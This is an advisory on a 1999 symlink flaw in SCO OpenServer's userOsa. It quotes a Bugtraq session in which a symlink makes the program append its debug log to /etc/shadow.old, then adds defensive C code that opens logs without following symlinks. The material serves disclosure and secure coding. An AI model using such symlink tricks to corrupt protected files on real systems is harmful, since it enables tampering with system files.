SCO OpenServer 5.0.5 'userOsa' symlink Vulnerability
As per Brock Tellier's original posting to Bugtraq:

scohack:/tmp$ ln -s /etc/shadow.old debug.log
scohack:/tmp$ /etc/sysadm.d/bin/userOsa bah
connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}}
Failed to listen to client
Failure in making connection to OSA.
scohack:/tmp$

-----

BEFORE EXPLOIT:

scohack:/# l /etc/shadow.old
-rw-rw---- 1 root auth 26 Oct 11 20:08 /etc/shadow.old

AFTER EXPLOIT (note the file size):

scohack:/# l /etc/shadow.old
-rw-rw---- 1 root auth 177 Oct 11 20:10 /etc/shadow.old
scohack:/# cat /etc/shadow.old
>>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <PID=11604> <<<
SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}})
scohack:/#
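The session shows the debug log being appended through a symlink named debug.log in the current directory. The following is an added example, not code from the original posting or from SCO, of how a program on a current POSIX system can open such a log without following a symlink; the function names, the temporary directory and the stand-in file "protected" are constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a log for appending. O_NOFOLLOW refuses a symlink as the final path
 * component; the fstat() check refuses non-regular files and hard links. */
int open_log_nofollow(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;                      /* errno is ELOOP for a symlink */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario in a private temp directory. "protected" stands in for
 * a file the caller must not alter. With as_symlink set, debug.log is a symlink
 * to it, as in the session above. Returns 1 if the log was opened, 0 if the
 * open was refused with ELOOP and "protected" kept its size, -1 otherwise. */
int demo_open(int as_symlink)
{
    char dir[] = "/tmp/logdemoXXXXXX", target[64], logp[64];
    struct stat before, after;
    int fd, saved, result = -1;
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/protected", dir);
    snprintf(logp, sizeof logp, "%s/debug.log", dir);
    fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, "original\n", 9) != 9) return -1;
    close(fd);
    if (as_symlink && symlink(target, logp) != 0) return -1;
    if (stat(target, &before) != 0) return -1;
    fd = open_log_nofollow(logp);
    saved = errno;
    if (fd >= 0) { result = 1; close(fd); }
    else if (saved == ELOOP && stat(target, &after) == 0
             && after.st_size == before.st_size) result = 0;
    unlink(logp); unlink(target); rmdir(dir);
    return result;
}
```

O_NOFOLLOW only covers the last path component, so the log should also live in a fixed directory that only the program's owner can write to, not in the caller's working directory.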